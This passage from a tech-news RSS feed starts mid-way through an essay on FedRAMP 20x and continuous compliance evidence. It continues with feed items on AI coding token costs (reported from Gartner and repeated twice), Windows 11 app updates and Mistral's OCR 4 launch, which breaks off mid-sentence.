<p>The audit becomes the finish line. Our finish line became a “good effort,” “we think you’re ready for a Low authorization, but not Moderate just yet.” For a moment, it felt like failure. It hurt. It felt fundamentally different from any other assessment or audit as we genuinely didn’t know what we’d achieved. In fact, FedRAMP 20x feels fundamentally different and maybe that’s the whole point.</p>



<p>The process itself became feedback.</p>



<p>Not: Can you tell a convincing enough story?</p>



<p>But: What does your environment actually look like and how do you continuously improve it?</p>



<p>That’s a completely different mindset.</p>



<p>One of the recurring themes throughout FedRAMP 20x is that assurance should improve through continuous iteration rather than annual point-in-time validation.</p>



<p>Exactly.</p>



<p>That’s how engineering works.</p>



<p>The Low authorization wasn’t the end state. It was a checkpoint and a recalibration moment that helped us understand where the next iteration needed to go.</p>



<p>And honestly, if you can speedrun moderate FedRAMP with perfectly polished dashboards and no uncomfortable truths exposed, then the framework probably isn’t doing its job.</p>



<p>That’s one of the things I genuinely appreciate about FedRAMP 20x.</p>



<p>It challenges your assumptions.</p>



<p>It forces you to rethink approaches that have become normalized across large parts of the compliance industry.</p>



<p>Historically, proving infrastructure security often meant screenshots or exported configs. Now we can expose every VM, every drift event and the full history of posture changes across the environment.</p>



<p>That changes behavior massively because you can no longer optimize around the cleanest possible sample. You have to maintain the actual posture continuously.</p>



<p>Historically, proving SDLC maturity meant selecting a handful of pull requests. Now we can expose the entire workflow, including every bypassed approval or manual push into production.</p>



<p>Historically, proving identity governance meant sampled JML reviews. Now we can expose the operational history of the full identity lifecycle over years.</p>



<p>And honestly, that was one of the areas that challenged some of our own assumptions the most.</p>



<p>Traditional sampled evidence can make processes look consistently successful because you’re only reviewing selected examples. But operational truth is different. You only need one joiner, mover or leaver process to fail in the wrong way for the risk to become real.</p>



<p>That’s exactly the kind of thing continuous operational visibility exposes much more quickly than traditional evidence collection.</p>



<p>That’s not just better evidence.</p>



<p>It’s a fundamentally different philosophy of assurance.</p>



<h2 class="wp-block-heading">The rise of GRC engineering</h2>



<p>And this is where I think GRC engineering becomes genuinely important.</p>



<p>Not because everybody suddenly needs to become a software engineer, but because the discipline itself is evolving from a documentation exercise into an operational engineering problem.</p>



<p>Modern GRC teams are increasingly building telemetry pipelines, integrations, APIs, infrastructure visibility and continuous assurance layers. And honestly, some of those pipelines are much harder to build than people realize. Cloud infrastructure, CSPM tooling and application security platforms are relatively straightforward because the data is already fairly structured and accessible. The really difficult parts are the messy operational systems that organizations historically handled through process and human coordination.</p>



<p>Things like policy management workflows, budget approvals, software bill of materials tracking and non-standard operational processes are far harder to standardize and expose consistently.</p>



<p>That’s another reason this shift matters so much. It forces organizations to operationalize areas that historically lived in spreadsheets, meetings or tribal knowledge.</p>



<p>That’s a very different skillset from managing spreadsheets and coordinating screenshots.</p>



<p>More importantly, it changes the conversations.</p>



<p>One of the things I enjoyed most throughout the FedRAMP 20x process was that discussions increasingly stopped being: How do we satisfy this control?</p>



<p>And became: What risk are we actually trying to reduce here?</p>



<p>That’s such a healthier conversation for security teams to have. Because not every risk matters equally to every organization. Not every control meaningfully improves security posture. Not every framework requirement deserves the same operational investment.</p>



<p>Traditional compliance often struggles with that nuance because it optimizes around consistency and uniformity.</p>



<p>Modern engineering-led assurance feels different.</p>



<p>It feels more contextual, more operational and honestly far more honest.</p>



<p>And honestly, honesty is probably the biggest thing missing from large parts of compliance today.</p>



<p>We’ve built an industry where everyone feels pressure to look perfect.</p>



<p>Perfect dashboards. Perfect controls. Perfect audit outcomes.</p>



<p>But real engineering environments are never perfect.</p>



<p>They have bugs, drift, exceptions, failures, temporary workarounds and weird edge cases.</p>



<p>That doesn’t automatically mean the environment is insecure. It means it’s real.</p>



<p>I actually think one of the biggest mindset shifts FedRAMP 20x and the broader GRC engineering movement are pushing is this: nonconformities should not automatically destroy trust. Handled correctly, they should build it.</p>



<p>Because mature organizations are not the ones pretending problems don’t exist. They’re the ones capable of identifying issues quickly, exposing them honestly and improving continuously. That’s engineering. And maybe that’s where compliance finally starts becoming useful again.</p>



<h2 class="wp-block-heading">The future of trust</h2>



<p>For organizations participating in the current pilots, many of these concepts are already being tested through automation-first assessments, machine-readable evidence and continuous visibility.  <a href="https://www.fedramp.gov/20x/phases/2">FedRAMP 20x Phase 2</a>.</p>



<p>Because right now, most compliance still works like we’re printing MapQuest directions in 2004 and hoping nothing changes between point A and point B.</p>



<p>The environment changes constantly. Cloud infrastructure drifts, engineers move quickly, businesses evolve and threat actors adapt far faster than annual audits ever could.</p>



<p>Yet most assurance still relies on frozen snapshots and sampled evidence that were already out of date the second they were exported into a PDF.</p>



<p>That’s the bit I think FedRAMP 20x genuinely understands. This isn’t just about modernising audits. It’s about acknowledging that modern systems are living systems.</p>



<p>They are transient, constantly changing and impossible to understand properly through static evidence alone.</p>



<p>That’s why the move towards APIs, telemetry and machine-readable evidence matters so much.</p>



<p>Not because APIs are trendy.</p>



<p>Because they allow us to expose operational truth continuously instead of periodically reconstructing it after the fact.</p>



<p>And honestly, I think that changes the future of trust.</p>



<p>In five years, I don’t think organizations will primarily send customers PDFs and certifications.</p>



<p>I think they’ll expose assurance layers.</p>



<p>APIs.<br>Telemetry.<br>Machine-readable evidence.</p>



<p>Instead of saying: Here’s our SOC 2.</p>



<p>They’ll say: Here’s the operational data. Query it yourself.</p>



<p>Auditors won’t disappear, but I think their role changes significantly.</p>



<p>Less time auditing screenshots and selected controls. More time validating whether the underlying evidence pipelines are complete, accurate and trustworthy.</p>



<p>Modern audit becomes less about auditing controls and more about auditing data integrity.</p>



<p>And honestly?</p>



<p>That feels like a much healthier future than the one we’ve built today.</p>



<p>Because the future of trust probably isn’t polished dashboards and carefully curated evidence. It’s operational truth, and operational truth is messy. It contains drift, exceptions, bypasses, gaps and uncomfortable findings, but that’s exactly why it’s valuable.</p>



<h2 class="wp-block-heading">Stop rewarding the best storytellers</h2>



<p>Maybe that’s the biggest shift FedRAMP 20x is trying to create. Not better paperwork. Better visibility.</p>



<p>For years, we’ve rewarded organizations for telling the cleanest story. Maybe it’s finally time we reward them for exposing the truth instead. That’s the revolution FedRAMP 20x and GRC engineering are leading.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why operational infrastructure is redefining private credit]]></title>
<description><![CDATA[As private credit scales, operational infrastructure is becoming critical to performance, transparency, and AI adoption.]]></description>
<link>https://tsecurity.de/de/3623870/it-nachrichten/why-operational-infrastructure-is-redefining-private-credit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623870/it-nachrichten/why-operational-infrastructure-is-redefining-private-credit/</guid>
<pubDate>Thu, 25 Jun 2026 11:02:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[As private credit scales, operational infrastructure is becoming critical to performance, transparency, and AI adoption.]]></content:encoded>
</item>
<item>
<title><![CDATA[8 inbox Windows 11 apps are getting a major update, here’s a closer look]]></title>
<description><![CDATA[Microsoft's latest Windows 11 Insider flight updates eight in-box apps, adding a continuous zoom slider and native QR scanning to Camera, AI watermarking controls in Photos, a counting-up timer in Clock, eraser transparency in Paint, and a faster Notepad with Find/Replace fixes.
The post 8 inbox ...]]></description>
<link>https://tsecurity.de/de/3623402/windows-tipps/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623402/windows-tipps/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/</guid>
<pubDate>Thu, 25 Jun 2026 07:25:03 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft's latest Windows 11 Insider flight updates eight in-box apps, adding a continuous zoom slider and native QR scanning to Camera, AI watermarking controls in Photos, a counting-up timer in Clock, eraser transparency in Paint, and a faster Notepad with Find/Replace fixes.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/25/8-inbox-windows-11-apps-are-getting-a-major-update-heres-a-closer-look/">8 inbox Windows 11 apps are getting a major update, here’s a closer look</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding token costs are on track to rival human payroll]]></title>
<description><![CDATA[Enterprises may soon be paying as much for their developers’ AI token usage as they do for their salaries.



According to Gartner, these costs will meet, or even exceed, the typical software engineer’s monthly salary within the next two years.



This is not only because developers are increasin...]]></description>
<link>https://tsecurity.de/de/3623163/ai-nachrichten/ai-coding-token-costs-are-on-track-to-rival-human-payroll/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623163/ai-nachrichten/ai-coding-token-costs-are-on-track-to-rival-human-payroll/</guid>
<pubDate>Thu, 25 Jun 2026 03:18:27 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprises may soon be paying as much for their developers’ AI token usage as they do for their salaries.</p>



<p><a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-24-gartner-predicts-ai-coding-costs-will-surpass-average-developer-salary-by-2028-as-token-consumption-surges" target="_blank" rel="noreferrer noopener">According to Gartner</a>, these costs will meet, or even exceed, the typical software engineer’s monthly salary within the next two years.</p>



<p>This is not only because developers are increasingly adopting generative AI and <a href="https://www.cio.com/article/3603856/agentic-ai-promising-use-cases-for-business.html" target="_blank">agentic tools</a>, it reflects a trend toward consumption-based licensing models as vendors balance infrastructure investments with profitability. Rather than the flat per-seat <a href="https://www.computerworld.com/article/4131921/saas-isnt-dead-the-market-is-just-becoming-more-hybrid-2.html" target="_blank">SaaS model</a> of the past, enterprises now pay for developer token use as well.</p>



<p>Gartner senior principal analyst <a href="https://www.gartner.com/en/experts/nitish-tyagi" target="_blank" rel="noreferrer noopener">Nitish Tyagi</a> explained that it’s important to note that Gartner’s prediction is based on a global average salary of $2,000 per month; it doesn’t mean AI token usage will exceed all salaries. For instance, in the US, yearly pay rates can be six digits or more.</p>



<p>However, that kind of spend is not out of the realm of possibility, Tyagi emphasized. “I have heard scary numbers like ‘My developer consumed $20K last month,’ or ‘A business user consumed $32K’.”</p>



<p>If these amounts sound shocking, that’s the point. “The goal is to alarm the industry about the impact of token cost if it is not governed and controlled,” he said.</p>



<h2 class="wp-block-heading">Lack of visibility, immature oversight</h2>



<p>Enterprises are quickly moving from experimentation to scaled deployment of <a href="https://www.infoworld.com/article/4183153/why-ai-coding-debt-is-different.html" target="_blank">AI coding agents</a>, but many still underestimate token costs, Tyagi noted.</p>



<p>This is because cost structures for software engineering workloads are “highly variable,” he pointed out, and there isn’t a lot of transparency into how token consumption is calculated and billed.</p>



<p>AI coding vendors have yet to deliver “mature, built-in cost optimization capabilities,” Tyagi said, and prices will likely only continue to rise as vendors further build out their models while at the same time trying to remain profitable.</p>



<p>Thus, enterprises struggle to forecast and control costs, and, because AI is moving so fast, many organizations lack the “maturity and frameworks” to determine ROI, he noted. Agent-driven workflows are difficult to govern, context windows become bloated, budgets are wiped out earlier than anticipated, and token spend becomes hard to justify.</p>



<p>Added to this, light users such as non-developers will increase their usage as they become more familiar with, and even reliant on, AI tools, driving up token consumption and spend even more.</p>



<p>Tyagi said that, while AI is incredibly valuable, he sees no “direct relationship” between the number of tokens developers consume and their productivity gains. Rather, applying context engineering principles to optimize or reduce token consumption increases quality.</p>



<p>“<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html" target="_blank">Tokenmaxxing</a> is not directly related to higher productivity gains,” Tyagi said, “but optimizing token consumption is.”</p>



<p>Still, this in no way means that organizations should move away from AI coding agents, he emphasized. Optimizing token consumption simply means spending only as much as needed without compromising the quality and value brought by AI.</p>



<p>“Without a governed engineering operating model, costs can escalate faster than the productivity gains these tools are designed to deliver,” Tyagi said.</p>



<h2 class="wp-block-heading">How enterprises can control token usage</h2>



<p>The traditional ‘lines-of-code-written’ productivity metric no longer applies when AI can almost instantaneously produce entire Python libraries. Rather, value should be measured in quality, speed, and customer satisfaction metrics, Tyagi said.</p>



<p>For instance: How quickly are developers able to release important features? How much time is reduced between app development and feedback from business, product, and development teams? Shipping features quickly while maintaining quality can create competitive advantage and improve user and customer experience, he said.</p>



<p>Gartner also advises establishing strong governance and cost controls. For instance, introduce token thresholds, automate usage monitoring, and create explicit escalation policies.</p>



<p>“Embedding these controls into engineering workflows ensures consistency and prevents uncontrolled cost growth,” the firm notes.</p>



<p>In addition, enterprises should create a “use case driven” decision framework. This means clearly defining when AI coding agents should be used, and their appropriate levels of autonomy given certain tasks. Further, classify those tasks into three execution models: ‘developer‑led,’ ‘developer‑with‑agent’, and ‘fully agent‑led.’</p>



<p>Enterprises should also select models based on task complexity. Break work into smaller tasks that can be performed by smaller models, “with escalation only when complexity demands it,” Gartner advises. Engineering teams should route workflows deliberately, directing simpler, high-frequency tasks to smaller models and using frontier models only for complex and high-value work.</p>



<p>Another cost saving tactic is mandating specific context engineering practices, the firm says. Developers should be trained to optimize the context they input to AI, including only the information that’s relevant, summarizing that content as much as possible, and eliminating unnecessary data.</p>



<p>Further, teams should embed token usage reviews into development cycles. Regular review of high token consuming workflows can help identify inefficiencies, refine practices, and support collaboration, Gartner says.</p>



<p>Tyagi noted that developers tend to optimize for speed and convenience rather than cost efficiency, so token discipline cannot be achieved through developer choice alone.</p>



<p>His advice for leaders: Do not treat escalating AI coding costs as a reason to move away from AI, or to shift to open generative AI models for everything. “The goal is always to optimize costs without compromising the value.”</p>



<p>Start small, and focus on context engineering first, he said. Assess your current software engineering maturity and select the appropriate agent autonomy. AI assistive development can provide up to 20% productivity gains, “which is not a bad number.”</p>



<p>For developers, he advises: “Target context engineering as one of the most important <a href="https://www.cio.com/article/2128415/generative-ai-certifications-and-certificate-programs.html" target="_blank">skills for yourself</a>. This is not only going to help your employer, but also your career.”</p>



<p><em>This article originally appeared on <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html" target="_blank">CIO.com</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI coding token costs are on track to rival human payroll]]></title>
<description><![CDATA[Enterprises may soon be paying as much for their developers’ AI token usage as they do for their salaries.



According to Gartner, these costs will meet, or even exceed, the typical software engineer’s monthly salary within the next two years.



This is not only because developers are increasin...]]></description>
<link>https://tsecurity.de/de/3623145/it-nachrichten/ai-coding-token-costs-are-on-track-to-rival-human-payroll/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623145/it-nachrichten/ai-coding-token-costs-are-on-track-to-rival-human-payroll/</guid>
<pubDate>Thu, 25 Jun 2026 02:47:34 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Enterprises may soon be paying as much for their developers’ AI token usage as they do for their salaries.</p>



<p><a href="https://www.gartner.com/en/newsroom/press-releases/2026-06-24-gartner-predicts-ai-coding-costs-will-surpass-average-developer-salary-by-2028-as-token-consumption-surges" target="_blank" rel="nofollow">According to Gartner</a>, these costs will meet, or even exceed, the typical software engineer’s monthly salary within the next two years.</p>



<p>This is not only because developers are increasingly adopting generative AI and <a href="https://www.cio.com/article/3603856/agentic-ai-promising-use-cases-for-business.html" target="_blank">agentic tools</a>, it reflects a trend toward consumption-based licensing models as vendors balance infrastructure investments with profitability. Rather than the flat per-seat <a href="https://www.computerworld.com/article/4131921/saas-isnt-dead-the-market-is-just-becoming-more-hybrid-2.html" target="_blank">SaaS model</a> of the past, enterprises now pay for developer token use as well.</p>



<p>Gartner senior principal analyst <a href="https://www.gartner.com/en/experts/nitish-tyagi" target="_blank" rel="nofollow">Nitish Tyagi</a> explained that it’s important to note that Gartner’s prediction is based on a global average salary of $2,000 per month; it doesn’t mean AI token usage will exceed all salaries. For instance, in the US, yearly pay rates can be six digits or more.</p>



<p>However, that kind of spend is not out of the realm of possibility, Tyagi emphasized. “I have heard scary numbers like ‘My developer consumed $20K last month,’ or ‘A business user consumed $32K’.”</p>



<p>If these amounts sound shocking, that’s the point. “The goal is to alarm the industry about the impact of token cost if it is not governed and controlled,” he said.</p>



<h2 class="wp-block-heading">Lack of visibility, immature oversight</h2>



<p>Enterprises are quickly moving from experimentation to scaled deployment of <a href="https://www.infoworld.com/article/4183153/why-ai-coding-debt-is-different.html" target="_blank">AI coding agents</a>, but many still underestimate token costs, Tyagi noted.</p>



<p>This is because cost structures for software engineering workloads are “highly variable,” he pointed out, and there isn’t a lot of transparency into how token consumption is calculated and billed.</p>



<p>AI coding vendors have yet to deliver “mature, built-in cost optimization capabilities,” Tyagi said, and prices will likely only continue to rise as vendors further build out their models while at the same time trying to remain profitable.</p>



<p>Thus, enterprises struggle to forecast and control costs, and, because AI is moving so fast, many organizations lack the “maturity and frameworks” to determine ROI, he noted. Agent-driven workflows are difficult to govern, context windows become bloated, budgets are wiped out earlier than anticipated, and token spend becomes hard to justify.</p>



<p>Added to this, light users such as non-developers will increase their usage as they become more familiar with, and even reliant on, AI tools, driving up token consumption and spend even more.</p>



<p>Tyagi said that, while AI is incredibly valuable, he sees no “direct relationship” between the number of tokens developers consume and their productivity gains. Rather, applying context engineering principles to optimize or reduce token consumption increases quality.</p>



<p>“<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html" target="_blank">Tokenmaxxing</a> is not directly related to higher productivity gains,” Tyagi said, “but optimizing token consumption is.”</p>



<p>Still, this in no way means that organizations should move away from AI coding agents, he emphasized. Optimizing token consumption simply means spending only as much as needed without compromising the quality and value brought by AI.</p>



<p>“Without a governed engineering operating model, costs can escalate faster than the productivity gains these tools are designed to deliver,” Tyagi said.</p>



<h2 class="wp-block-heading">How enterprises can control token usage</h2>



<p>The traditional ‘lines-of-code-written’ productivity metric no longer applies when AI can almost instantaneously produce entire Python libraries. Rather, value should be measured in quality, speed, and customer satisfaction metrics, Tyagi said.</p>



<p>For instance: How quickly are developers able to release important features? How much time is reduced between app development and feedback from business, product, and development teams? Shipping features quickly while maintaining quality can create competitive advantage and improve user and customer experience, he said.</p>



<p>Gartner also advises establishing strong governance and cost controls. For instance, introduce token thresholds, automate usage monitoring, and create explicit escalation policies.</p>



<p>“Embedding these controls into engineering workflows ensures consistency and prevents uncontrolled cost growth,” the firm notes.</p>



<p>In addition, enterprises should create a “use case driven” decision framework. This means clearly defining when AI coding agents should be used, and their appropriate levels of autonomy given certain tasks. Further, classify those tasks into three execution models: ‘developer‑led,’ ‘developer‑with‑agent’, and ‘fully agent‑led.’</p>



<p>Enterprises should also select models based on task complexity. Break work into smaller tasks that can be performed by smaller models, “with escalation only when complexity demands it,” Gartner advises. Engineering teams should route workflows deliberately, directing simpler, high-frequency tasks to smaller models and using frontier models only for complex and high-value work.</p>



<p>Another cost saving tactic is mandating specific context engineering practices, the firm says. Developers should be trained to optimize the context they input to AI, including only the information that’s relevant, summarizing that content as much as possible, and eliminating unnecessary data.</p>



<p>Further, teams should embed token usage reviews into development cycles. Regular review of high token consuming workflows can help identify inefficiencies, refine practices, and support collaboration, Gartner says.</p>



<p>Tyagi noted that developers tend to optimize for speed and convenience rather than cost efficiency, so token discipline cannot be achieved through developer choice alone.</p>



<p>His advice for leaders: Do not treat escalating AI coding costs as a reason to move away from AI, or to shift to open generative AI models for everything. “The goal is always to optimize costs without compromising the value.”</p>



<p>Start small, and focus on context engineering first, he said. Assess your current software engineering maturity and select the appropriate agent autonomy. AI assistive development can provide up to 20% productivity gains, “which is not a bad number.”</p>



<p>For developers, he advises: “Target context engineering as one of the most important <a href="https://www.cio.com/article/2128415/generative-ai-certifications-and-certificate-programs.html" target="_blank">skills for yourself</a>. This is not only going to help your employer, but also your career.”</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mistral launches OCR 4, turning document extraction into a full enterprise AI play]]></title>
<description><![CDATA[Mistral AI on Tuesday released OCR 4, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generati...]]></description>
<link>https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622912/it-nachrichten/mistral-launches-ocr-4-turning-document-extraction-into-a-full-enterprise-ai-play/</guid>
<pubDate>Wed, 24 Jun 2026 23:48:27 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://mistral.ai/">Mistral AI</a> on Tuesday released <a href="https://mistral.ai/news/ocr-4/">OCR 4</a>, a document intelligence model that moves beyond raw text extraction to return structured representations of entire documents — complete with bounding boxes, block-type classification, and per-word confidence scores. The release marks Mistral's fourth generation of optical character recognition technology in roughly 15 months and lands at a moment when the company's pitch for European AI sovereignty has never been more commercially relevant.</p><p>The model supports 170 languages across 10 language groups, accepts PDF, DOC, PPT, and OpenDocument formats, and can be deployed as a single container on an organization's own infrastructure — a capability Mistral is positioning directly at enterprises in regulated industries that cannot route sensitive documents through U.S.-jurisdiction cloud APIs.</p><p>"Mistral OCR 4 extracts and structures content from a wide range of documents," the company said in its announcement. "Where previous generations focused on converting a page into clean text and tables, OCR 4 returns a structured representation of the document."</p><p>The model is <a href="https://docs.mistral.ai/resources/cookbooks?useCase=OCR">available immediately</a> through the <a href="https://mistral.ai/pricing/">Mistral API</a>, Document AI in <a href="https://mistral.ai/products/studio/">Mistral Studio</a>, <a href="https://aws.amazon.com/sagemaker/ai/">Amazon SageMaker</a>, and <a href="https://azure.microsoft.com/en-us/products/ai-foundry">Microsoft Foundry</a>, with <a href="https://www.snowflake.com/en/blog/engineering/enterprise-scale-document-ai/">Snowflake Parse Document</a> support coming soon. Pricing starts at $4 per 1,000 pages, dropping to $2 per 1,000 pages through a batch API discount.</p><div></div><h2><b>OCR 4 treats every document as a semantic map, not a wall of text</b></h2><p>The central engineering shift in <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is structural. Rather than outputting a flat stream of extracted text — the paradigm that has defined OCR for decades — the model returns a layered representation in which every block is localized with a bounding box, classified by type (title, table, equation, signature, and others), and scored for confidence at both the page and word level.</p><p>Mistral says bounding boxes were its most-requested capability. The reason is straightforward: without location data, downstream systems cannot trace an extracted fact back to its source on a specific page. That traceability gap has been a persistent friction point for enterprises building retrieval-augmented generation (RAG) pipelines, compliance workflows, or any application where "where did this number come from?" is a question that needs an auditable answer.</p><p>Block classification addresses a related problem. A paragraph tagged as a "title" can segment a document into hierarchical chunks for semantic search. A block tagged as a "table" can be routed to a structured-data pipeline rather than a text summarizer. A block tagged as a "signature" can trigger a redaction workflow in a compliance system.</p><p>These are not novel ideas in isolation, but packaging them as first-class outputs of the OCR model itself — rather than requiring a separate layout-analysis stage — removes an integration layer that enterprise teams have historically had to build and maintain themselves.</p><p>The confidence scores serve a dual purpose. At scale, they allow organizations to programmatically route low-confidence regions to human reviewers and auto-approve high-confidence extractions, building what the industry calls human-in-the-loop verification without requiring a person to review every page of every document. In production systems, OCR is rarely the end goal — it is the first step in a larger pipeline.</p><p>Developers building RAG systems, agent workflows, or document automation often spend more time reconstructing layout and structure than on the downstream AI logic itself. OCR 4 aims to eliminate that reconstruction step, and if it delivers on that promise, the value accrues not just in OCR cost savings but in reduced engineering hours across the entire document pipeline.</p><h2><b>Independent reviewers preferred Mistral's output 72 percent of the time, but benchmarks tell a complicated story</b></h2><p>Mistral reports that <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> achieved a 72% average win rate in a head-to-head human evaluation against leading competitors, conducted by independent annotators across more than 600 real-world documents in over 12 languages. The model also achieved the top overall score on <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench</a> at 85.20 and scored 93.07 on <a href="https://github.com/opendatalab/OmniDocBench">OmniDocBench</a>.</p><p>But the company itself urges caution in interpreting those numbers. In its release, Mistral took the unusual step of auditing and publicly disclosing the specific types of scoring artifacts it encountered, including ground-truth errors in the reference annotations, equivalent LaTeX notation scored as mismatches, column-reading-order assumptions, and header/footer attribution issues. "We therefore treat the aggregate score as directional rather than definitive," the company said — a notably transparent stance from a vendor announcing a product.</p><p>That transparency is well-timed. On the public <a href="https://huggingface.co/datasets/allenai/olmOCR-bench">OlmOCRBench leaderboard</a>, some researchers have noted that OCR 4 currently ranks third, behind open models like Chandra OCR 2. And some open-weight models self-report higher OmniDocBench composite scores — <a href="https://huggingface.co/PaddlePaddle/PaddleOCR-VL-1.6">PaddleOCR-VL-1.6</a> claims 96.33 — though those results have not been independently reproduced on the public leaderboard.</p><p>Early enterprise feedback has been favorable nonetheless. Aidan Donohue, an AI engineer at financial AI firm Rogo, said the company benchmarked OCR 4 against leading agentic document parsers on a chart-dense financial QA dataset and "reached equivalent accuracy at roughly 8x lower cost and 17x lower latency." Ivan Mihailov, an AI engineer at intellectual property management firm Anaqua, said OCR 4 is "roughly 4x faster per page than our incumbent provider." </p><p>Enterprise buyers, however, should run their own evaluations rather than relying on any vendor's benchmark numbers. The practical question is not which model scores highest on a leaderboard, but which model produces the fewest errors on your specific documents, in your specific languages, at a price and latency that fit your workflow.</p><h2><b>The Anthropic export ban gave Mistral's sovereignty pitch the proof point it needed</b></h2><p>Mistral's release lands in a geopolitical context that could hardly be more favorable for its strategic positioning.</p><p>On June 12, <a href="https://www.anthropic.com/news/fable-mythos-access">Anthropic was forced to disable all access to its newest AI models</a>, Fable 5 and Mythos 5, after the U.S. Commerce Department used national security export controls to bar the company from distributing the models to any foreign national. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without prior warning or effective recourse. As of June 24, both models remain offline, with <a href="https://kalshi.com/markets/kxfablerestore/fable-restored/kxfablerestore-27">prediction markets giving only 57% odds of restoration</a> before July 1.</p><p>That episode validated a warning Mistral CEO Arthur Mensch has been sounding for over a year. As Business Insider reported, <a href="https://www.businessinsider.com/anthropic-model-access-mistral-opportunity-ai-sovereignty-2026-6">Mensch warned at London Tech Week</a> in June 2025 about American AI companies "having the keys" for their models, calling it a scenario where European companies are "giving leverage to their providers." He added: "At some point, you need to be able to turn it off or turn it on, and you don't want to leave it to another country."</p><p>The argument gained further urgency as Mensch's broader sovereignty pitch escalated in recent months. As reported by CNBC in late May, <a href="https://www.cnbc.com/2026/05/28/mistral-arthur-mensch-design-chips-ai-data-centers.html">Mensch told the outlet</a>: "Europe is lagging behind when it comes to [the] buildout of infrastructure, and so we are investing to close that gap." </p><p>At the same time, <a href="https://www.reuters.com/business/media-telecom/mistral-defends-ai-use-warfare-rebuts-pope-criticism-2026-05-28/">Mensch pushed back against Pope Leo XIV's call for AI to be "disarmed,"</a> arguing that Europe cannot afford to fall behind U.S. tech giants. "We're all for ​peace, but if you look at our rivals and adversaries in the world, they're using artificial ​intelligence … we do need to have our own capabilities," Mensch told reporters.</p><p>OCR 4's single-container, self-hosted deployment model is the product-level expression of that argument. A U.S.-headquartered provider offering EU data residency means documents are stored in Frankfurt but governed by U.S. law. Mistral, incorporated in France and operating under EU jurisdiction, offering on-premise containerized deployment, means documents never leave the customer's infrastructure at all. The <a href="https://artificialintelligenceact.eu/article/99/">EU AI Act's fine enforcement provisions</a> take effect August 2, adding regulatory pressure to the compliance calculus for European enterprises evaluating document AI vendors.</p><h2><b>Baidu's free, open-weight OCR model arrived one day earlier — and the contrast is revealing</b></h2><p>Mistral's release did not arrive in isolation. Just one day before <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> launched, Baidu shipped <a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> on June 22 — a 3-billion-parameter MIT-licensed model that tackles one of the most persistent pain points in document AI: parsing entire PDFs and multi-page scans in a single forward pass, without chunking the input or stitching the output back together afterward.</p><p>Baidu's model uses a technique called <a href="https://arxiv.org/html/2606.23050v1">Reference Sliding Window Attention (R-SWA)</a> that, as a top <a href="https://news.ycombinator.com/item?id=48643426">Hacker News commenter explained</a>, splits the AI's focus into two paths: maintaining full attention on the original document image while restricting memory of generated text to a tight, moving window. The result is constant KV cache size and the ability to transcribe 40-plus pages in a single forward pass. The model gathered <a href="https://github.com/baidu/Unlimited-OCR">1,800 GitHub stars</a> in its first 24 hours and racked up more than <a href="https://news.ycombinator.com/item?id=48643426">479 upvotes on Hacker News</a>, where the discussion thread ran to 109 comments.</p><p>The two releases frame what some analysts are calling the June 2026 document-AI split: self-hosted long-horizon parsing with open weights versus structured managed extraction with enterprise features.</p><p><a href="https://github.com/baidu/Unlimited-OCR">Baidu's model</a> is free under an MIT license, runs on standard GPU hardware, and has no managed API or enterprise SLA. <a href="https://mistral.ai/news/ocr-4/">Mistral's model</a> is a commercial product with per-page pricing, bounding boxes, confidence scores, block classification, multi-platform distribution, and self-hosted deployment options for enterprise customers. </p><p><a href="https://huggingface.co/baidu/Unlimited-OCR">Unlimited-OCR</a> may be the better tool for a research team digitizing scanned dissertations on a single GPU. <a href="https://mistral.ai/news/ocr-4/">OCR 4</a> is built for the IT procurement process — the world of SLAs, data processing agreements, and compliance audits.</p><p>Beyond Baidu, the broader OCR competitive field includes <a 